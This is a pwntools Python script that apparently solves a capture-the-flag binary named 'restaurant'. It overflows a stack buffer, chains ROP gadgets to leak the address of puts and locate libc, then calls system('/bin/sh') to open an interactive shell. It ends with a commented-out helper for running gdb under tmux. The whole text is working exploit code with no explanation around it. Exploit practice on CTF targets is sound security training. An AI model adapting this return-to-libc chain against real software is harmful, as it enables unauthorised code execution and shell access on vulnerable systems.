from pwn import * context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' elf = ELF('restaurant', checksec=0) if True: proc = gdb.debug(elf.path, '\n'.join([ # 'b *0x00400ed2', # after read # 'b *0x00400eec', # ret 'c' ])) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=0) else: pass rop1 = ROP([elf]) rop1.call(elf.plt['puts'], [elf.got['puts']]) rop1.call(elf.symbols['fill']) proc.sendline('1') padding = b'a' * 32 + b'b' * 8 proc.send(padding + rop1.chain()) proc.recvuntil(padding) marker = b'\n\x1b[1;6;32m\nYou can add these' result = proc.recvuntil(marker) print(f'Read the following: {[result]}') offset_addr_raw = result[-6 - len(marker): -len(marker)].ljust(8, b'\x00') offset_addr = u64(offset_addr_raw) print(f'Found offset address {offset_addr_raw} --> {hex(offset_addr)}') libc.address = offset_addr - libc.symbols['puts'] print(f'Found libc at {hex(libc.address)}') rop2 = ROP([libc]) rop2.call(libc.symbols['puts'], [next(libc.search(b'/bin/sh'))]) rop2.call(libc.symbols['system'], [next(libc.search(b'/bin/sh'))]) proc.send(padding + rop2.chain()) proc.interactive() # line 277 # # Ugly solution to fix gdb and tmux compatibility # if terminal == 'tmux': # found = False # while not found: # log.info('Looking for gdb subprocess (the ugly way)') # import time # time.sleep(0.1) # import subprocess # output = subprocess.check_output(['ps', '-ax', '-o', 'pid:1,args:1']) # programs = [(line.split(b' ')[0], b' '.join(line.split(b' ')[1:])) for line in output.split(b'\n')][::-1] # search_argv = (' '.join(command) if isinstance(command, (list, tuple)) else command).replace(' ', ' ').replace('"', '').encode() # for pid_test, argv_test in programs: # if argv_test == search_argv: # log.debug('Found gdb pid: %s' % pid_test) # pid = int(pid_test) # found = True # break # os.system('tmux last-pane')